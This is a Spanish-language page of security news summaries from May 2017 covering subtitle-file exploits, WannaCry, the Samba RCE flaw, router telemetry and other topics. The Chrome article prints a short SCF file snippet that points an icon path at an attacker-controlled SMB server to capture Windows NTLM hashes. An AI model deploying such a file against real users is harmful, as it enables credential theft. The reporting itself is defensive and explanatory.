Bienvenido a Indetectables.net

Hackers están introduciendo malware en los ficheros de subtítulos

Investigadores de CheckPoint han descubierto ficheros de subtítulos específicamente diseñados para actuar como exploits, los cuales además pueden terminar teniendo consecuencias catastróficas para el usuario.

Dichos exploits entran en acción cuando el usuario abre un fichero de subtítulos malicioso con reproductores de vídeo tan populares como Popcorn Time y VLC. Evidentemente, el material pirata tiene mucho que ver aquí, al igual que pasa con los cracks para activar copias ilegales de aplicaciones y sistemas operativos. Debido a que los usuarios y los reproductores de vídeo confían en los ficheros de subtítulos sin ninguna comprobación adicional, se abre la puerta a que los exploits incluidos en esos ficheros específicamente diseñados entren en acción, pudiendo funcionar como descargadores de otros malware que podrían hasta otorgar el control de las computadoras afectadas a los hackers.

Esta es la explicación de CheckPoint sobre este asunto:

Nuestros investigadores desvelan un posible nuevo vector de ataque, utilizando una técnica que ha pasado totalmente desapercibida en el que un ciberataque es ejecutado cuando los subtítulos de una película son cargados por el usuario mediante un reproductor multimedia. Esos repositorios de subtítulos son, en la práctica, como una fuente de confianza para el usuario y el reproductor multimedia. Nuestra investigación también revela que esos repositorios pueden ser manipulados para otorgar a los subtítulos maliciosos de los atacantes una puntuación alta, lo que deriva en el hecho de que esos subtítulos específicos son los utilizados al final por el usuario. Este método requiere de una pequeña o no deliberada acción por parte del usuario, volviéndolo todo mucho más peligroso.

A diferencia de otros ataques de vectores, de los cuales tanto las firmas de seguridad como los usuarios son muy conscientes, los subtítulos de las películas son percibidos como poco más que ficheros de texto benignos.

En caso de ser usuario de Popcorn Time, se puede descargar el parche desde el sitio web de la aplicación, mientras que en otros reproductores como VLC, Kodi y Stremio el parche tendría que llegar a través de sus actualizaciones automáticas (sí, ya está disponible).

Os dejamos con un vídeo demostrativo y un esquema sobre el exploit. En el vídeo se puede apreciar cómo los subtítulos se encargan de activar una conexión a TinyVNC con la máquina del atacante, dándole la posibilidad de controlar el escritorio de la víctima.

Gráfico del hackeo con malware introducido en ficheros de subtítulos para vídeos

Fuente: TechCrunch

por Eduardo Medina Fri, 26 May 2017 09:54:53 +0000

protección

En los últimos días, Wannacry ha acaparado multitud de titulares, conversaciones y, especialmente, preocupaciones. Y es que este patógeno del tipo ransomware ha alcanzado un nivel de difusión nunca visto hasta ahora en otros ataques de este tipo, y eso que como ya indicaba Kaspersky Lab en Secure List, en enero del año pasado, su ritmo de crecimiento ya era más que acusado. Y, de esta manera, ha devuelto a esta modalidad delictiva a la primera línea de las amenazas de las que hay que defenderse lo antes posible, con todas las medidas que están a nuestro alcance. Para esto es imprescindible saber en qué consiste y cómo funciona el ransomware. Y ese es precisamente el objetivo de este artículo, en el que hablaremos de la amenaza en sí misma, su funcionamiento, las medidas preventivas, y las posibles soluciones si ya hemos sufrido un ataque.

¿Qué es el ransomware?

Hablamos de un tipo de patógeno cuyo principal objetivo es bloquear el sistema o determinados archivos del mismo pidiendo un rescate (económico) a su propietario. Este tipo de ataque se cierne sobre todo tipo de dispositivos… incluso los móviles, puesto que hace ya dos años se detectaron los primeros en Android.

¿Cómo funciona?

Un ataque de ransomware de divide en dos fases. La primera es la infección de un sistema y la segunda, el secuestro del mismo y / o sus archivos. ¿Cómo lo hace? Sencillo, simplemente procede a cifrarlos, de manera que sea imposible volver a acceder a ellos si no se cuenta con la clave necesaria. Una clave que, claro, solo está en manos de los delincuentes.

Y entonces es cuando llega el susto: el usuario al intentar acceder a sus documentos, se encuentra con un mensaje como este:

mensaje

Wannacry, imagen de Kaspersky Secure List.

En dicho mensaje, como se puede comprobar, se informa al usuario de que sus archivos han sido cifrados. Además, se muestra una cuenta atrás, en la que se marca un plazo (generalmente bastante corto) en el que la víctima debe realizar un pago (o una serie de ellos), o el archivo cifrado se destruirá, lo que supondrá la pérdida definitiva de los mismos.

Por norma general, los pagos se deben efectuar en bitcoins, a un monedero de esta ciberdivisa indicado en el mensaje (que además, en las variantes más dañinas de Wannacry, se muestra en múltiples idiomas, con unas completas instrucciones de uso). Con este sistema los delincuentes garantizan el mantener su anonimato y poder cobrar los rescates, sin tener que pasar por entidades bancarias que sí que podrían tracear el rastro del dinero para dar con ellos. Además, la cuenta atrás añade un enorme elemento de presión a las víctimas, que son más propensas a pagar el rescate si ven que se acerca el límite del plazo, que si se saben con todo el tiempo del mundo para decidir si pagar o no.

Además, en casos como el de Wannacry, el patógeno no solo realizará sus acciones en el sistema infectado, sino que intentará emplear su conexión de red para propagarse en otros sistemas conectados a la misma.

Para leer el artículo completo, haz clic aquí.

por Elisabeth Rojas Thu, 25 May 2017 15:12:34 +0000

Más de 104.000 instalaciones de Samba son vulnerables de ataques remotos

Según un aviso publicado el día de ayer, las versiones de Samba liberadas en los últimos siete años tienen una vulnerabilidad de ejecución de código en remoto que permite a un atacante subir y ejecutar código en una computadora objetivo. Dependiendo de las habilidades del hacker, este podría hasta hacerse con el control del sistema.

La vulnerabilidad, cuyo código es CVE-2017-7494, afecta a todas las versiones de Samba desde la 3.5.0 en adelante y fue corregida por los mantenedores de este servidor el día de ayer en las versiones 4.6.4, 4.5.10 y 4.4.14. Según H. D. Moore, Vicepresidente de Investigación y Desarrollo en Atredis Partners, el problema de seguridad podría ser explotado a través de una línea de código utilizando el módulo Metasploit, que actualmente se encuentra en desarrollo. Esto significa que la vulnerabilidad CVE-2017-7494 podría ser pasado por un script y añadido a escáneres automatizados.

El problema es vuelve incluso más grande si vemos que Rapid7 ha descubierto más de 104.000 instalaciones de Samba expuestas a Internet que contienen la vulnerabilidad. Algunas distribuciones Linux instalan el mencionado servidor por defecto para facilitar la interoperabilidad con Windows.

Medida de mitigación para servidores que no se pueden actualizar

El parche solo está disponible para las ramas 4.4.x, 4.5.x, y 4.6.x de Samba. Para todos los que no puedan actualizar a la versión 4.4 por incompatibilidades de software o limitaciones de hardware, el Equipo de Samba recomienda como solución alternativa la siguiente mitigación a través de la adición un parámetro en el fichero smb.conf (en los sistemas Linux suele estar localizado en /etc/samba/smb.conf) en la sección [global] y luego reiniciar el servicio.

Establecer el parámetro:

nt pipe support = no

Medida de mitigación para la vulnerabilidad hallada en Samba (para versiones obsoletas del servidor)

Reiniciar el servicio en systemd. En caso de no tener sudo instalado hay que iniciar la sesión como root y no escribir sudo, empezando el comando por systemctl. En caso de haberse iniciado sesión como root y tener sudo instalado, la primera palabra se puede o se tiene que obviar:

sudo systemctl restart smbd.service
sudo systemctl restart nmbd.service

El parámetro evita que un atacante pueda abrir una “tubería” que le permita subir código malicioso a una instalación de Samba. Sin embargo, esto tiene un efecto que posiblemente no guste a muchos, y es que se deja de compartir con sistemas operativos Windows.

Se recomienda aplicar el parche publicado cuanto antes, sobre todo en servidores que están funcionando y escuchando desde Internet a través de los puertos 139 y 445, que son los utilizados por el protocolo SMB.

¿Qué es Samba?

Samba es una implementación libre de los protocolos SMB y CIFS (siendo el segundo el sucesor del primero). Básicamente permite a sistemas Unix y Unix-like (como Linux) compartir ficheros y otros recursos como impresoras con Windows, consiguiendo así cierto nivel de interoperabilidad entre sistemas de distinta naturaleza.

Sin embargo, el protocolo SMB ha sido puesto en evidencia en los últimos tiempos por culpa de WannaCry y de otra vulnerabilidad severa recientemente descubierta que implicó al navegador web Chrome.

Debido a todas las incidencias a nivel de seguridad recientes que están relacionadas o han implicado a SMB/CIFS, recomendamos la inhabilitación de Samba en todos los sistemas operativos Linux, Unix y Unix-like que no necesiten interaccionar con Windows.

Fuente: BleepingComputer

por Eduardo Medina Thu, 25 May 2017 11:55:05 +0000

Defiéndete del ransomware con la herramienta gratuita de Kaspersky: Kaspersky Anti-Ransomware

Aunque el ransomware es un tipo de malware que lleva tiempo ocupando portadas en los medios centrados en la ciberseguridad, no ha sido hasta la expansión reciente de WannaCry cuando se ha dado a conocer de forma clara ante el público general.

WannaCry ha infectado a más de 200.000 ordenadores en 150 países, gracias a que utilizó un mecanismo de esparcimiento derivado de las herramientas robadas y filtradas de la NSA. De hecho es su mecanismo de esparcimiento lo que hace peligroso a WannaCry, ya que en lo que se refiere al ransomware, no parece algo fuera de lo común y estándar dentro de este tipo de malware. Tras la primera oleada, Europol está avisando sobre una nueva versión tipo gusano que podría terminar siendo incluso más peligrosa que la anterior.

Muchos ransomware no pueden ser descifrados de forma gratuita, provocando que el daño causado sea irreparable al menos se pase por la caja de los ciberdelincuentes, y en caso de de ser una empresa, esto puede derivar en fuertes pérdidas, tanto a nivel de económico como de clientes.

Con el fin de evitar que el ransomware se convierta en un episodio trágico para una empresa, Kaspersky Anti-Ransomware es una herramienta gratuita creada para proteger, sobre todo a pequeñas y medianas empresas, del ransomware y el cryptomalware. Funciona con cualquier otra solución de seguridad sin necesidad de instalar los productos de Kaspersky Lab.

Kaspersky Anti-Ransomware es una herramienta que ayuda a prevenir la infección de un tipo de malware que si bien no es el más extendido, sí se ha mostrado posiblemente como el más peligroso. Por otro lado, esto no evita el tener que tomar medidas de precaución adicionales debido a la peligrosidad mencionada.

En la informática toda medida de seguridad tomada puede terminar siendo poca, así que cuantas más medidas se tomen, mejor.

por Eduardo Medina Wed, 24 May 2017 10:10:58 +0000

Netgear ha introducido recolección de datos en uno de sus modelos de routers

Netgear está distribuyendo desde hace un tiempo un nuevo firmware para el router NightHawk R7000. Esto en sí mismo no es una noticia destacable, salvo por el hecho de que dicho firmaware incluye una nueva característica que permite al fabricante recolectar datos para analíticas que van a sus servidores.

De momento el firmware solo ha llegado al NightHawk R7000, aunque no se descarta que pueda llegar a otros modelos de routers. Por otro lado, la polémica característica introducida por Netgear recolecta los siguientes datos:

  • El número total de dispositivos conectados al router.
  • Dirección IP.
  • Dirección MAC.
  • Número de serie.
  • Estado de ejecución del router.
  • Tipos de conexión.
  • Estado de la LAN y la WAN.
  • Bandas Wi-Fi y canales.
  • Detalles técnicos sobre el uso y funcionamiento del router y de la red Wi-Fi.

La compañía ha argumentado que está recolectando esos datos para rutinas de diagnósticos con el fin de saber cómo son usados y cómo se comportan sus routers en entornos reales. La intención es poder “aislar y depurar más rápido los problemas técnicos generales, mejorar la funcionalidad y las características del router y mejorar el rendimiento y la usabilidad.”

Evidentemente, no han tardado en surgir voces criticando este movimiento de Netgear, y es que para muchos los datos recopilados pueden ser abusivos. En caso de ser un usuario del NightHawk R7000 y haber actualizado recientemente el firmware, la recolección de datos puede ser inhabilitada siguiendo los siguientes pasos:

  • Abrir un navegador web compatible con los estándares web modernos (da igual que sea un PC, un smartphone o una tablet).
  • Entrar al acceso del router a través de la URL http://www.routerlogin.net.
  • Introducir el nombre de usuario y la contraseña de acceso al router. En caso de no haber cambiado la configuración por defecto (algo que no se tiene que hacer) el nombre de usuario sería admin y la contraseña password.
  • Seleccionar Advanced (Avanzado) → Administration (Administración) → Router Update (Actualización del router) desde la página de inicio (Home).
  • Descender con el scroll hasta encontrar la sección Router Analytics Data Collection (Recolección de Datos para Analíticas del Router) y seleccionar la opción Disable (Inhabilitar o Desactivar).
  • Hacer clic sobre el botón Apply (Aplicar) para guardar los cambios.

Alternativa: Instalar DD-WRT

DD-WRT es un firmware Open Source basado en Linux diseñado para mejorar la seguridad de los routers con soporte para redes Wi-Fi.

Muchas personas obsesionadas con la privacidad instalan DD-WRT sustituyendo el firmware del fabricante, aunque antes de hacer nada sería mejor comprobar la lista de dispositivos compatibles y ver si el router actualmente en uso está soportado. En caso afirmativo, se puede proceder a la descarga e instalación del firmware.

Para instalar DD-WRT hay que seguir los siguientes pasos:

  • Acceder a la administración del router. Generalmente la IP local es 192.168.0.1 o 192.168.1.1.
  • Ir a la sección de administración del router y seleccionar “Actualización del firmware” (el nombre puede cambiar según el modelo).
  • Seleccionar el fichero del firmware de DD-WRT y subirlo.
  • Esperar a que el proceso de actualización termine (se recomienda encarecidamente el uso de un SAI para evitar sustos y desgracias relacionados con apagones y bajones de tensión en el fluido eléctrico).
  • Se recomienda asegurarse al máximo sobre la compatibilidad, ya que en caso de no serlo, el router podría acabar roto e inservible.

Fuente: The Hacker News

por Eduardo Medina Tue, 23 May 2017 10:45:58 +0000

Google Play Protect pretende mejorar la seguridad de los dispositivos Android

Google ha presentado recientemente otra herramienta defensiva a nivel de seguridad para Android: Google Play Protect.

Google Play Protect es una herramienta para Android que ha sido introducida en la aplicación Play Store. Lo que hace es utilizar el aprendizaje automático y realizar análisis de uso de las aplicaciones para eliminar o bloquear las que resulten peligrosas y/o maliciosas. No requiere que los usuarios activen su protección por separado y estas son las partes de las que se compone:

  • Escaneo de aplicaciones.
  • Medidas anti robo.
  • Protección de la navegación.

Escaneo de aplicaciones

Google Play Protect es un servicio activo en la aplicación de la Play Store que, según el gigante de Mountain View, podría escanear 50.000 millones de aplicaciones cada día a través de los más de mil millones de dispositivos Android activos en el mundo (escanea las aplicaciones instaladas).

Google ya ha tomado medidas para evitar el esparcimiento del malware a través de su ecosistema, incluyendo la aplicación Verify Apps y el servicio Bouncer. Sin embargo, estos no han resultado ser suficientes, lo que ha provocado la detección tardía de algunos malware como Bankbot. Google Play Protect no solo protege de las aplicaciones procedentes de la Play Store, sino también de las que vienen de tiendas de terceros, lo que aumenta de forma notable su utilidad.

Google ha empleado algoritmos de aprendizaje automático para comprar los comportamientos de las aplicaciones y distinguir aquellos que sean anormales. En caso de encontrar un comportamiento malicioso, avisa al usuario e incluso podría inhabilitar la aplicación para evitar un daño mayor.

Por otro lado, la compañía está actualizando constantemente sus algoritmos de aprendizaje automático para mejorarlos y encontrar nuevos riesgos y aplicaciones maliciosas, así como la decisión de mantenerlas o no instaladas en los dispositivos una vez detectadas.

Medidas anti robo

Las medidas anti robo son para el robo físico. Aquí, Android Device Manager ha sido reemplazado por Encontrar Mi Dispositivo (Find My Device) para localizar uno que se haya perdido o extraviado.

El usuario puede usar el navegador o cualquier otro dispositivo para realizar llamadas remotas, localizar y bloquear un dispositivo Android, e incluso podría borrar los datos de forma remota con el fin de protegerlos.

Encontrar Mi Dispositivo es básicamente el mismo mecanismo que Android Device Manager, aunque incluido en el programa de Google Play Protect para hacerlo más accesible.

Navegación segura

La Navegación segura es una característica que abarca la navegación con Chrome. Obviamente, se trata de mantener seguro al usuario mientras navega, algo en lo que Google lleva trabajando desde hace años con su navegador.

La navegación web suele ser una de las vías más comunes para difundir malware. Esta característica incluida en Google Play Protect se encarga de avisar y bloquear páginas web sospechosas o que son inseguras.

Google Play Protect tendría que empezar a ser desplegado en las próximas semanas.

Fuente: The Hacker News

por Eduardo Medina Mon, 22 May 2017 11:12:40 +0000

Hay opciones de descifrar WannaCry gratis desde un Windows XP infectado

Los usuarios de Windows XP tienen una posibilidad de descifrar WannaCry de forma gratuita, aunque para ello han tenido que evitar el apagado o reinicio del ordenador después de haber sido infectados por el temido ransomware.

Esto ha sido descubierto por Adrien Guinet, investigador en la empresa de ciberseguridad francesa Quarkslab, quien ha liberado un software que le ha permitido recuperar la clave secreta de descifrado para restaurar una computadora con Windows XP en su laboratorio. Este software todavía no ha sido probado a fondo, así que no se sabe si puede ser aplicado sobre la gran variedad de computadoras que funcionan con el vetusto sistema operativo de Microsoft, e incluso en caso de funcionar, podría haber limitaciones.

La repercusión de esta técnica de recuperación puede verse limitada debido a que Windows XP no parece haberse visto tan afectado por el gran brote de WannaCry surgido la semana pasada. A pesar de que el ransomware es compatible con dicho sistema, su mecanismo de dispersión parece que no. Por otro lado, Matt Suiche, un investigador de Comae Technologies, ha reportado a través de Twitter que no fue capaz de ejecutar la herramienta de Guinet con éxito.

WannaCry utiliza la API Criptográfica de Microsoft incluida en el propio Windows para manejar muchas de sus funciones, incluyendo la generación de la clave de cifrado y descifrado de los ficheros. Después de crear la clave de seguridad, la API se encarga de borrarla en la mayoría de versiones de Windows.

Aparentemente se ha descubierto una limitación en Windows XP que evita el borrado de la clave. Como resultado, los números primos utilizados para generar la clave secreta de WannaCry permanecen intactos en la memoria del ordenador mientras el sistema siga encendido tras la infección. La herramienta de Guinet, cuyo nombre es Wannakey, fue capaz de examinar con éxito la memoria de una máquina XP infectada y extraer los valores las variabes p y q en las que se basa la clave secreta. A partir de ahí, según ha publicado en Twitter, el investigador fue capaz de extraer la clave.

Sobre WannaCry no hay nada realmente destacable, ya que se trata de un ransomware estándar. Lo que ha convertido a este malware en algo realmente peligroso ha sido su mecanismo de esparcimiento, el cual está basado en una herramienta de hacking de la NSA llamada EternalBlue y que fue filtrada por Shadow Brokers.

El descubrimiento de Adrien Guinet ha podido abrir la puerta al descifrado gratuito y total de WannaCry, aunque todavía es pronto para cantar victoria. Por otro lado, esto no es excusa para bajar la guardia bajo ningún concepto.

Fuente: ArsTechnica

por Eduardo Medina Fri, 19 May 2017 14:13:22 +0000

Una vulnerabilidad abierta por Chrome permite robar credenciales de Windows

Un investigador en seguridad ha descubierto una importante vulnerabilidad en la configuración por defecto de la última versión de Google Chrome cuando es ejecutada sobre cualquier versión sistema operativo Windows, incluido la 10.

Bosko Stankovic, de DefenseCode, ha encontrado un fichero SCF (Shell Command File) malicioso mientras visitaba un sitio web. Dicho fichero hace que las víctimas entreguen inconscientemente a los hackers las credenciales de acceso al sistema operativo, utilizando para ello el navegador web Google Chrome y el protocolo SMB (el mismo que estuvo implicado en el esparcimiento de WannaCry).

La técnica en sí misma no es nueva, ya que fue empleada por Stuxnet, un malware que en un principio fue diseñado para neutralizar estructuras de Irán. Para realizar sus acciones maliciosas, Stuxnet usaba ficheros de acceso directo LNK de Windows para comprometer los sistemas objetivo. Sin embargo, lo que hace diferente al ataque mediante Google Chrome es el hecho de utilizar autenticación a través de SMB.

El formato de ficheros de atajo SCF funciona de forma similar al LNK y está diseñado para soportar conjuntos limitados de órdenes del Explorador de Windows para definir iconos presentes en el escritorio, como los correspondientes a Equipo (antes Mi PC) y la Papelera de reciclaje. Básicamente, se tratan de ficheros de texto localizados en el escritorio con una sintaxis específica de Shell que define la localización de un icono y el ejecutable de la aplicación.

[Shell]
Command=2
IconFile=explorer.exe,3

Desde que el navegador de Google confía en los ficheros SCF, los atacantes pueden engañar a una víctima para que visite sitios web que contengan accesos directos SCF específicamente diseñados. Dichos ficheros son descargados en el espacio del usuario de forma automática y sin pedir ninguna confirmación debido a que Google Chrome inicia las descargas de forma automática.

Después de haber sido descargados, los ficheros se ejecutan para recuperar un icono sin que el usuario tenga que hacer clic sobre estos. Sin embargo, en lugar de una ruta donde se localiza un icono, lo que contiene en realidad es la dirección de un servidor SMB remoto controlado por el atacante, cuyo código podría ser el siguiente:

[Shell]
IconFile=\\170.170.170.170\icon

Tan pronto como el fichero SCF inicie el falso proceso de recuperación de icono, engañará al sistema para que realice una autenticación automática sobre el servidor remoto controlado por el atacante a través del protocolo SMB. Esto entregará el nombre de usuario y la contraseña “hasheada” (cifrada) de la víctima, permitiendo al atacante utilizar dichas credenciales para autenticarse en el sistema o a un recurso de red.

Desde que se destapó el caso de Stuxnet, Microsoft parcheó para que los accesos directos LNK no pudiesen apuntar más allá del propio ordenador local, sin embargo, parece que se le olvidó aplicar esto sobre los ficheros SCF.

¿Cómo procesa Windows las credenciales de forma automática a un servidor?

Ejemplo de autenticación NTLM

Así es cómo funciona la autenticación a través de un servidor SMB en combinación con la petición y respuesta del mecanismo de autenticación NTLM. Empezaremos por los cuatro pasos realizados por la autenticación LM/NTLM:

  1. Los usuarios de Windows (clientes) intentan acceder a un servidor.
  2. El servidor responde con un valor de petición, pidiendo al usuario que cifre el valor de petición con su contraseña cifrada y lo mande de vuelta.
  3. Windows maneja las peticiones SCF a través del envío al servidor del nombre de usuario del cliente y la contraseña cifrada.
  4. Entonces el servidor captura la respuesta y aprueba la autenticación en caso de que la contraseña cifrada sea la correcta.

Ahora, según el escenario de ataque SCF elaborado por Stankovic, Windows intentará autenticarse en el servidor SMB malicioso automáticamente suministrándole el nombre de usuario de la víctima y su contraseña cifrada a través de NTLMv2, tal y como está descrito en el tercer paso.

En caso de que la víctima forme parte de una red corporativa, las credenciales de red asignadas a su usuario por el administrador de sistema de la empresa serán enviadas al atacante. En caso de que la víctima sea un usuario doméstico, su nombre de usuario y su contraseña de Windows serán enviados al atacante.

El hecho de enviar la contraseña cifrada la vuelve difícil de utilizar para iniciar sesión, pero al tener el atacante el nombre de usuario, se abre la puerta a la utilización de la fuerza bruta para hallar la contraseña. Por otro lado, también es importante recalcar que algunos servicios de Microsoft podrían aceptar la contraseña cifrada como forma de acceso, entre los cuales se puede mencionar a OneDrive, Outlook.com, Office 365, Office Online, Skype y Xbox Live.

Esta vulnerabilidad abre la puerta a otras como la posibilidad de ir escalando privilegios una vez se haya conseguido acceder a un sistema, algo que puede terminar teniendo consecuencias desastrosas en caso de tratarse de una red corporativa.

Cómo evitar este ataque relacionado con la autenticación a través de SMB

En primer lugar, se recomienda tener los puertos 139 y 445 cerrados para el tráfico saliente en el router, ya que son los utilizados por los servidores SMB.

Stankovic también recomienda inhabilitar las descargas automáticas en Google Chrome. Para ello hay que dirigirse a Configuración > Mostrar configuración avanzada > seleccionar “Preguntar dónde se guardará cada archivo antes de descargarlo”. El hecho de tener que aprobar manualmente las descargas dará la oportunidad al usuario de rechazar los ficheros sospechosos o que no ha solicitado.

Por su parte, Google ya ha anunciado que está trabajando en la elaboración de un parche contra esta vulnerabilidad.

Inhabilitar las descargas automáticas en Google Chrome

Fuente: The Hacker News

por Eduardo Medina Thu, 18 May 2017 14:05:43 +0000

Un malware usa un falso dominio de WordPress para robar cuentas de administrador

Investigadores en seguridad de Sucuri han encontrado sitios WordPress legítimos que han sido alterados para hacerse con las cookies de los administradores y luego acceder como estos, utilizando para ello un dominio falso que presuntamente pertenece a la API de WordPress.

El atacante desvía las cookies robadas a code.wordpressapi.com, un dominio perteneciente a un servicio no existente de WordPress. Cesar Anjos, de Sucuri, encontró este malware escondido en la parte inferior de unos ficheros de JavaScript legítimos mientras respondía a un incidente.

El propósito del malware es robar cookies y enviarlas a un dominio falso cada vez que un usuario accedía a su sitio web legítimo, cuyo código JavaScript contiene escondido la parte maliciosa empleada por los hackers. Procediendo de esta manera, parece que el objetivo principal es hacerse con cuentas de administrador para luego acceder con elevados privilegios a sitios WordPress legítimos.

Las cookies generadas por los administradores de sitios WordPress contienen datos que pueden ser usados para mimetizar sus accesos sin necesidad de introducir las contraseñas. Este tipo de ataque, que se llama secuestro de sesión, permitiría a un atacante acceder al backend o back office del CMS, pudiendo hasta crear nuevas cuentas de administrador cuyos propietarios serían los atacantes.

Los expertos de Sucuri no han explicado cómo se ha podido cargar código malicioso en los ficheros JavaScript de sitios WordPress legítimos, pero la gran cantidad de instalaciones, temas y plugins obsoletos que están en funcionamiento muestran el ecosistema montado con este CMS como inseguro. Los temas y plugins obsoletos contienen vulnerabilidades que los hackers podrían aprovechar para controlar un sitio web o bien llevar a cabo ataques complejos.

WordPress lanza un programa de recompensas en HackerOne

Curiosamente, el equipo tras el CMS más utilizado de Internet decidió ayer poner en marcha un programa de recompensas por encontrar vulnerabilidades en la plataforma HackerOne.

El programa cubre proyectos oficiales como WordPress, BuddyPress, bbPress, GlotPress y WP-CLI, así como todos los sitios web oficiales: WordPress.org, bbPress.org, WordCamp.org, BuddyPress.org y GlotPress.org.

En un programa de recompensas anterior, que fue llevado a cabo de forma privada por el equipo de WordPress, se concedieron premios de 3.700 dólares para aquellos que consiguieran reportar una vulnerabilidad funcional.

WordPress 4.5.7 ya está disponible

El día de ayer también fue liberado la versión 4.5.7 del CMS y de la cual se puede destacar los siguientes fallos corregidos:

  • Validación insuficiente en la redirección en la clase HTTP.
  • Manejo inapropiado de los valores post de metadatos en la API XML-RPC.
  • Falta de capacidades de comprobación para los metadatos de post en la API XML-RPC.
  • Una vulnerabilidad de Falsificación de Petición de Coss Site (CRSF) descubierta en el diálogo de credenciales del sistema de ficheros.
  • Una vulnerabilidad de cross-site scripting (XSS) descubierta cuando se intentaba subir ficheros pesados.
  • Una vulnerabilidad de cross-site scripting (XSS) descubierta relacionada con Customizer.

Fuente: BleepingComputer

por Eduardo Medina Wed, 17 May 2017 10:39:10 +0000

Descubren que WannaCry podría tener vínculos con Corea del Norte

El investigador en seguridad Neel Mehta, que trabaja en Google, ha encontrado evidencias en el ransomware WannaCry que podrían vincularlo con un grupo de hackers apoyado por el estado de Korea del Norte, el cual es conocido por sus ciberataques contra organizaciones de Corea del Sur.

Para poder afirmar esto, Mehta ha descubierto en el código de WannaCry trozos que son idénticos a otros usados a principios de 2015 por Cantopee, un backdoor malicioso desarrollado por Lazarus Group, un grupo de hackers que se cree que está patrocinado por el gobierno de Corea del Norte.

Tras el descubrimiento de Mehta, expertos de Kaspersky Lab, Intezer, Symantec y Comaeio empezaron también a analizar en profundidad el código de WannaCry, encontrando estrechos vínculos con otras familias de malware como Lazarus, Jonap y Brambul, lo que sugiere que el ransomware que causó estragos el pasado fin de semana podría haber sido escrito y modificado por el mismo autor.

Evidencias que podrían vincular WannaCry con Lazarus Group, un grupo de hackers que podría estar vinculado a Corea del Norte

Para los que no recuerden quién es Lazarus Group, recordamos que se le acusa de robar millones de dólares a través de ataques contra el sistema de gestión bancaria SWIFT y según agencias estadounidenses está detrás del ataque hacker contra Sony Pictures ocurrido en 2014.

Sin embargo, de momento no se puede confirmar que el régimen de Kim Jong-Un esté detrás de WannaCry, ya que los hackers detrás de este ransomware han podido igualmente copiar código procedente de malware de Lazarus Group y otros. Tampoco se puede descartar que la inclusión de dicho código haya sido con el propósito de despistar a autoridades, agencias de inteligencia e investigadores.

Symantec ha anunciado que seguirá investigando para despejar todas las incógnitas, mientras que Matt Suiche, de Comaeio, ha comentado que WannaCry podría “ser el primer ransomware impulsado por un estado.”

Noticias relacionadas:

Fuente: The Hacker News

por Eduardo Medina Tue, 16 May 2017 10:13:20 +0000